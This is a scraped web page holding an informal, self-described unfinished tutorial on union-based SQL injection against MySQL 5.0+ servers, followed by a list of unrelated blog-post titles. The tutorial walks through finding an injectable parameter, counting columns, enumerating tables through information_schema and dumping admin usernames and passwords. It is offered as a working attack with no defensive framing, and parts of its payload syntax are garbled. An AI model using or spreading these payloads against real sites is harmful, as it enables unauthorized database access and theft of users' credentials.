mysql注入5.0以上_[Injection]对MYSQL 5.0服务器以上版本注入
How to do a SQL Injection for MYSQL Server 5.0+
1. Find a vulnerable add a ‘ at the end of the site example: news.php?id=1 add a ‘ at the end of the 1 and see if you get a syntax error
2. order by #–
Keep upping the # until you get an error.
3. union all select 1,#,#,#,#,#–
Above 6 numbers if the site you have shows more then 6 or less then since you need to add or remove them
4. Find a column # that is showed from step 2 example if there are 5 columns shown you can pick column 2
5. concat_ws(0×3A,version(),@@version) in vulnerable column
add concat_ws(0×3A,version(),@@version) to a vulnerable column like column 2 see if it shows the SQL version if it don’t try adding a – before the php?id=-# and see if you get the version
Will show the version of the SQL Server recommended that it be 5.0
6. union all select 1,group_concat(table_name),#,#,#,# from information_schema.tables where table_schema=database()–
This selects all the the tables from the database.
7. Find a table your after like admin or like users or user whatever table you wanna see
8. union all select 1,group_concat(column_name),#,#,#,# from information_schema.columns where table_name=char(x)–
Replace x with the ASCII of table name You will need to convert Text to ASCII.
9. union all select 1,group_concat(table_name,0×3a,table_name)#,#,#,# from column_name–
Replace table_name with the table name your after the 0×3a is hex for “:” table_name would be replaced with the other table name yours after
so for example say you found a table named admin and you wanna see the username and password columns you’d do
union all select 1,group_concat(username,0×3a,password,0×3c62723e)#,#,#,# from table_name–
Basically its going to show the username 0×3a is hex for “:” then the password 0×3c62723e is hex for a “< br >” which breaks them down in displaying, be sure to change the table_name to the name of the table so say your going for admin change the table_name– to admin–
after that you will either get the username and password in plain text or it will be hashed.
just so you know change the # signs to the ammount of rows you get in Step 3 if you have 2 rows it should be 1,2 or you have 5 rows it should be 1,2,3,4,5 and so on.
Side note may need to add a – between like the thefilename.php?id=-#
So if a website has 5 rows you’d add all 5 rows the last number don’t add a “,”
Unfinished Tutorial Wrote by ZaraByte
mysql注入5.0以上_[Injection]对MYSQL 5.0服务器以上版本注入相关推荐
- mysql insert 不需要日志_详解MySQL|你不知道的新特性-8.0错误日志增强
MySQL 8.0 重新定义了错误日志输出和过滤,改善了原来臃肿并且可读性很差的错误日志. 比如增加了 JSON 输出,在原来的日志后面以序号以及 JSON 后缀的方式展示. 比如我机器上的 MySQ ...
- mysql数据库64免安装_【文】MySQL-8.0.18-winx64免安装配置
引言:最近手里撸了几个活,需要用到数据库.又不想太麻烦去安装MySQL.翻找u盘.发现了以前下载的MySQL8.0.18它是压缩包,果断上手去年元旦三天前下载的,有点意思开始配置! 1.首先解压文件, ...
- mysql中如何设置主键一直从0开始_怎么让mysql的id从0开始
满意答案 有时候我们在测试网站的时候,删除测试数据导致id不是从0开始,那如果想id是从0开始怎么办呢? mysql默认自增ID是从1开始了,但当我们如果有插入表或使用delete删除id之后ID就会 ...
- mysql安装check requirements出错_超详细的MySQL8.0.17版本安装教程
下载MySQL MySQL的官网地址:https://www.mysql.com/. 如下图所示: 然后点击DOWNLOADS ==> Community,选择MySQL Community S ...
- mysql主键自增长_全面的MySQL优化面试解析
本文概要 文章内图片有损,需要高清可以在公众号内回复"大图" 概述 为什么要优化 系统的吞吐量瓶颈往往出现在数据库的访问速度上 随着应用程序的运行,数据库的中的数据会越来越多,处理 ...
- mysql 删除多余帐号_安装完mysql数据库后的优化(删除多余用户和数据库)
安装完mysql数据库后的优化(删除多余用户和数据库) 发布时间:2020-06-27 19:09:35 来源:51CTO 阅读:2761 作者:冰冻vs西瓜 栏目:数据库 1.查看数据库的版本信息: ...
- mysql update多个字段_常见的MySQL命令大全fourth
1:使用SHOW语句找出在服务器上当前存在什么数据库: mysql> SHOW DATABASES; 2:2.创建一个数据库MYSQLDATA mysql> Create DATABASE ...
- mysql动力节点百度云_动力节点MySQL数据库视频 百度云 网盘 下载
资源名称:动力节点MySQL数据库视频 百度云 网盘 下载 # o4 E. q% ]2 ?百度网盘下载链接:[/hide]- t4 L+ S# b2 T( }! d) n& d 密码:dff7 ...
- mysql不同实例数据同步_两台Mysql数据库数据同步实现实例
做开发的时候要做Mysql的数据库同步,两台安装一样的系统,都是FreeBSD5.4,安装了Apache 2.0.55和PHP 4.4.0,Mysql的版本是4.1.15,都是目前最新的版本. 1. ...
最新文章
- Caffe源码中layer文件分析
- 区块链将重新定义世界
- MappedByteBuffer的使用
- m3u8地址_「波波带你手动提取网页视频」04讲 Network和Elements提取m3u8链接
- java string set_Java StringJoiner setEmptyValue()用法及代码示例
- 2017计算机信息技术,2017年一级计算机信息技术及应用考试试题级答案[权威资料]...
- 坑爹的UICollectionView
- 2013 ACM区域赛长沙 K Pocket Cube hdu 4801
- 职称计算机技巧集锦,2014职称计算机考试《Excel》使用技巧集锦(4)
- python 将图片旋转多个角度_用Python玩转PDF的各种骚操作
- 传智播客 C/C++学习笔记 二级指针作为输出参数以及空间的释放
- VPS部署以及域名设置和DNS解析
- mac 固态硬盘 格式化_您可以格式化硬盘或固态硬盘多少次?
- [BZOJ4199][NOI2015]品酒大会(后缀数组+单调栈+ST表)
- java 调用百度语音
- Java 调用OPENOFFIC 转换文档类型
- Winfrom 常用控件(二)
- Centos7下turn off cpu throttling
- mybatis 自定义拦截器
- (18)ROS学习-TF坐标变换之静态坐标变换
热门文章
- 解决:Dockerfile 中执行 tar 命令始终报错:tar: /xx/xx: Cannot stat: No such file or directory tar: Exiting with
- java.lang.UnsupportedOperationException 异常分析
- QEMU 3.0.0 新特性一览
- 如何使用postman做接口测试
- jsp通过include指令引入html乱码的解决方法
- 【IDEA 2016】intellij idea tomcat jsp 热部署
- SU suspecfk命令学习
- nodejs npm常用命令
- python解约瑟夫环问题
- hdu 1159(最长公共子序列)